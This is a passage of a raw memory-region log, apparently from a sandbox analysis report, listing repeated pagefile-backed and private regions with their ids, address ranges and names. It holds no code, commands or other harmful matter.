0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18801 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18802 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18803 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18804 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18805 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18806 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18807 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18808 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18809 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18810 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18811 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18812 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18813 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18814 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18815 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18816 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18817 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18818 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18819 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18820 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18821 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18822 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18823 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18824 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18825 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18826 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 18827 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 18828 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18829 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18830 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 18831 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 18832 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18833 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18834 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18835 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18836 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18837 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18838 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18839 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18840 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18841 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18842 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18843 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18844 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18845 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18846 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18847 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18848 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18849 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18850 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18851 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18852 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 18853 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 18854 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18855 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18856 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18857 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18858 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18859 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18860 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18861 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18862 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18863 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18864 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18865 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18866 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18867 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18868 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18869 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18870 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18871 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18872 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18873 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18874 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18875 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18876 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18877 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18878 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18879 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18880 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18881 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18882 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18883 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18884 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18885 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18886 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18887 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18888 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18889 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18890 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18891 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18892 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18893 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18894 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18895 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18896 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18897 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18898 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18899 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 18900 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 18901 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18902 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18903 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18904 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18905 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18906 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18907 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18908 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18909 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18910 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18911 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18912 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18913 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18914 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18915 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18916 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18917 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18918 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18919 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18920 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18921 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18922 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18923 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18924 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18925 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18926 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18927 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18928 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18929 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18930 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18931 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18932 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18933 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18934 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18935 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18936 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18937 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18938 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18939 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18940 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18941 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18942 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18943 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18944 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18945 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 18946 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 18947 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18948 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18949 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 18950 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 18951 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18952 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18953 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18954 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18955 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18956 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18957 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18958 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18959 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18960 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18961 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18962 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18963 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 18964 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 18965 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18966 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18967 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 18968 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18969 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18970 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18971 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18972 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18973 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18974 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18975 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18976 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18977 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18978 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18979 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18980 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18981 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18982 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18983 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18984 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18985 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 18986 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" 